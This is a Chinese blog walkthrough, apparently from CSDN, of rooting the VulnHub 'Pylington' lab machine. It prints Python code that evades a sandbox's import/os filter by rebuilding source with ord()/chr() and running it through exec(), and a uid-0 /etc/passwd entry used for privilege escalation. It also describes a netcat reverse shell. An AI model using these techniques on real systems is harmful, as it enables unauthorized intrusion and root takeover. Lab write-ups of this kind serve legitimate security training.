【pylington靶机】

信息搜集

在这里插入图片描述
启动靶机。

在这里插入图片描述
使用nmap扫描网段地址,发现靶机ip地址以及对应对外开启的端口服务。

web服务探测

在这里插入图片描述
在这里插入图片描述
使用dirsearch扫描下网站目录,发现一个关键文件robots.txt,打开发现一个无规则字符的文件。
在这里插入图片描述
在这里插入图片描述
发现一个用户以及密码。

在这里插入图片描述
在这里插入图片描述
登录成功后,发现一个连接地址。
在这里插入图片描述
打开连接后,发现一个在线python执行页面,并且提示,不可以使用os模块,并且有示例文件。

在这里插入图片描述
在这里插入图片描述
发现执行代码,存在import代码和os以及open函数时,将会被拦截。
在这里插入图片描述
在这里插入图片描述

line= "import os;os.system('ls -al')"
tmp_str =[]
for c in line:
    tmp_str.append(str(ord(c)))
print(tmp_str)
tmp_chr =''
for i in tmp_str:
    tmp_chr+=chr(int(i))
print(tmp_chr)
exec(tmp_chr)
a = ord('a')
print(a)
i = chr(a)
print(i)

使用exec()内置函数执行字符代码。将字符转换为数字,并存储到列表中,在运行代码时再将数字转换字符。
其中使用ord()、chr()函数进行数字和字符之间的转换。
在这里插入图片描述
发现成功绕过。下一步探测下可用的指令。
在这里插入图片描述
在这里插入图片描述
发现存在netcat指令。
在这里插入图片描述
使用nc指令反弹会话。
在这里插入图片描述
会话反弹成功。
使用python -c "import pty;pty.spawn(‘/bin/bash’);"获取交互性会话。
在这里插入图片描述
在/home/py目录下发现存在typing可执行文件,以及typing.cc文件,打开typing.cc文件发现typing可执行文件是获取用户密码的文件。
获取密码:54ezhCGaJV
在这里插入图片描述
在nmap扫描时,发现22端口时开放的。使用ssh连接py用户。
在这里插入图片描述
连接成功。
在这里插入图片描述
在/home/py/secret_stuff目录下存在一个备份文件,发现可以使用backup可执行文件对/etc/passwd文件进行修改。
在这里插入图片描述
使用openssl生成密码。

admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0:root:/root:/bin/bash
密码为:admin

在这里插入图片描述
发现成功写入到/etc/passwd文件中。切换用户为admin.
在这里插入图片描述
成功获取root权限。

参考链接

靶机下载地址:https://www.vulnhub.com/entry/pylington-1,684/.

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值